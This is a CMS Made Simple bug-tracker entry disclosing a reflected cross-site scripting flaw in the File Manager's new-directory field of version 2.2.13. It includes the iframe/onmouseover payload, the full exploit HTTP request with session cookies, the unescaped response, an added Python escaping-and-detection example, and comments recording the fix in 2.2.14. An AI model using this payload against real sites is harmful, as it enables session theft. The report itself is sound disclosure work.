CMS MADE SIMPLE FORGE

CMS Made Simple Core


[#12224] Reflected Cross-Site Scripting - CMS Made Simple 2.2.13

Created By: Guram Javakhishvili (guramjava)
Date Submitted: Sun Dec 22 17:19:25 -0500 2019

Assigned To:
Version: 2.2.13
CMSMS Version: 2.2.13
Severity: Minor
Resolution: Fixed
State: Closed
Summary:
Reflected Cross-Site Scripting - CMS Made Simple 2.2.13
Detailed Description:
# Summary:

• Title: CMS Made Simple 2.2.13 Cross Site Scripting (XSS) Reflected
• Date: 22/12/2019
• Author: Guram Javakhishvili
• Email: guramj@gmail.com, misheljava@gmail.com
• Software: CMS Made Simple 2.2.13
• Product Version: 2.2.13
• Vulnerability Type: Injection
• Vulnerability: Cross Site Scripting (XSS) Reflected

# Description:

CMS Made Simple version 2.2.13 suffers from reflected and persistent (stored)
cross-site scripting and HTML injection vulnerabilities.
Insufficient validation of user input in the authenticated part of the CMS Made
Simple web application exposes the application to reflected cross-site scripting
(XSS).
These vulnerabilities allow potentially dangerous user input to be accepted by
the application and then embedded back, unescaped, into the HTML response of the
page returned by the web server.

# Steps to Reproduce:

The attacker needs appropriate permissions, but not Admin rights (the Editor or
Designer user roles suffice), in order to create News, Content, Directories,
Shortcuts, etc.
The File Manager function was found to be vulnerable to reflected cross-site
scripting (XSS).
Log in as Designer > click on 'Content' > click on 'File Manager' > create a new
Directory > insert the XSS payload into the 'New Directory' field and click Create.

List of vulnerable parameters:
	• m1_newdirname

Attack vector:
"/><iframe/onmouseover=alert(document.cookie)>//

# Request:

POST /cmsms-2.2.13/admin/moduleinterface.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Origin: http://localhost
Connection: close
Cookie:
6a048a268372a94a595fdec4fbda4134aa83a6e6=39ad8f674b75bdccf8ef6290736c7ac60708435d%3A%3AeyJ1aWQiOjMsInVzZXJuYW1lIjoiZGVzaWduZXIiLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkS0FPa1NsQTdKSXR2RFRsdVBhSVRJLkhIOE4yMkJtZmYyUC5KczVFMGFGeW5nRmxVVDVmMnEifQ%3D%3D;
__c=7536d3867590a8fcc52; CMSIC1a82b0c9a5=4c765t5v2p4prm6t8v940s15nc;
CMSSESSIDa9ac5a041c5c=ibso1e87pflpck00qt050vmoqj
Upgrade-Insecure-Requests: 1

mact=FileManager%2Cm1_%2Cfileaction%2C0&__c=7536d3867590a8fcc52&m1_fileactionnewdir=&m1_path=%2Fuploads%2Fd&m1_newdirname=%22%2F%3E%3Ciframe%2Fonmouseover%3Dalert%28document.cookie%29%3E%2F%2F&m1_submit=Create

# Snip of HTTP response:

<input type="hidden" name="m1_submit" value="Create" />
</div>

<div class="pageoverflow">
  <p class="pagetext"><label for="newdir">New directory:</label></p>
<p class="pageinput"><input type="text" name="m1_newdirname" id="newdir"
value=""/><iframe/onmouseover=alert(document.cookie)>//" size="40"/></p>
</div>

<div class="pageoverflow">
  <p class="pagetext"></p>
<p class="pageinput"><input class="cms_submit" name="m1_submit" id="m1_submit"
value="Create" type="submit" />
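The response above shows the submitted m1_newdirname value landing inside a value="" attribute with no escaping, which is what lets the payload close the attribute and open a new tag. The following Python example is added here and is not CMS Made Simple code: the two render functions are hypothetical stand-ins for the File Manager template (one unescaped, one with attribute-context escaping, the equivalent of PHP's htmlspecialchars with ENT_QUOTES), and the tokenizer-based check flags any rendering in which the attribute is broken out of.

```python
"""Reflected-XSS check for a value echoed into an HTML attribute (added example)."""
import html
from html.parser import HTMLParser

# Payload from the report, as submitted in m1_newdirname (URL-decoded).
PAYLOAD = '"/><iframe/onmouseover=alert(document.cookie)>//'


def render_unescaped(newdirname: str) -> str:
    """Hypothetical vulnerable rendering: raw input is concatenated into the attribute."""
    return (f'<input type="text" name="m1_newdirname" id="newdir" '
            f'value="{newdirname}" size="40"/>')


def render_escaped(newdirname: str) -> str:
    """Hypothetical hardened rendering: escape for attribute context, quotes included."""
    safe = html.escape(newdirname, quote=True)
    return (f'<input type="text" name="m1_newdirname" id="newdir" '
            f'value="{safe}" size="40"/>')


class TagCollector(HTMLParser):
    """Records every start tag and its attributes as a tolerant tokenizer sees them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, dict]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup: str) -> list[tuple[str, dict]]:
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def injected_tags(markup: str) -> list[str]:
    """Tag names other than the expected <input>; non-empty means the attribute was escaped from."""
    return [tag for tag, _ in parse_tags(markup) if tag != "input"]


def attribute_intact(markup: str, original: str) -> bool:
    """True iff the markup tokenizes to exactly one <input> whose value round-trips to the input."""
    tags = parse_tags(markup)
    return len(tags) == 1 and tags[0][0] == "input" and tags[0][1].get("value") == original
```

Running injected_tags over the vulnerable rendering reports the injected iframe, while the escaped rendering yields a single input whose value attribute decodes back to the original string.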

History

Comments
Date: 2020-03-01 05:47
Posted By: Guram Javakhishvili (guramjava)

Hi,

Is there any update on this?
      
Date: 2020-03-01 14:03
Posted By: Guram Javakhishvili (guramjava)

Could you please assign CVE to this vulnerability? Thanks.
      
Date: 2020-03-18 11:13
Posted By: Rolf (rolf1)

fixed for 2.2.14
      
Date: 2020-03-21 14:05
Posted By: Guram Javakhishvili (guramjava)

Could you please assign CVE to this vulnerability? Thanks.
      
Date: 2020-03-30 13:12
Posted By: Rolf (rolf1)

CMS Made Simple 2.2.14 is released
      
Date: 2020-05-03 16:01
Posted By: Guram Javakhishvili (guramjava)

Hello,

Is there any update on this? I have been asking for an update since my
submission of the above vulnerability. It is by now over five months since this
vulnerability was reported to you by myself.
And I would like to ask you if you would let me go public by next week?
Could you please mark this as PUBLIC?
I also wish to request a CVE number for this vulnerability if that is ok?

If you have any questions please let me know.

Regards,
Guram
      
Updates

Updated: 2020-03-30 13:12
state: Open => Closed

Updated: 2020-03-18 10:35
resolution_id: 5 => 7
severity_id: 2 => 3
assigned_to_id: 106 => 100

Updated: 2019-12-22 17:57
summary: CMS Made Simple 2.2.13 - Reflected Cross-Site Scripting => Reflected Cross-Site Scripting - CMS Made Simple 2.2.13

Updated: 2019-12-22 17:28
description: # Summary: • Title: CMS Made Simple 2.2.13 Cross Site Scripting (XSS) Reflected • Date: 22/12/2019 • Author: Guram Javakhishvili • Email: guramj@gmail.com • Software : CMS Made Simple 2.2.13 • Product Version: 2.2.13 • Vulnerabil => # Summary: • Title: CMS Made Simple 2.2.13 Cross Site Scripting (XSS) Reflected • Date: 22/12/2019 • Author: Guram Javakhishvili • Email: guramj@gmail.com, misheljava@gmail.com • Software : CMS Made Simple 2.2.13 • Product Version: 2.
resolution_id: => 5
assigned_to_id: 100 => 106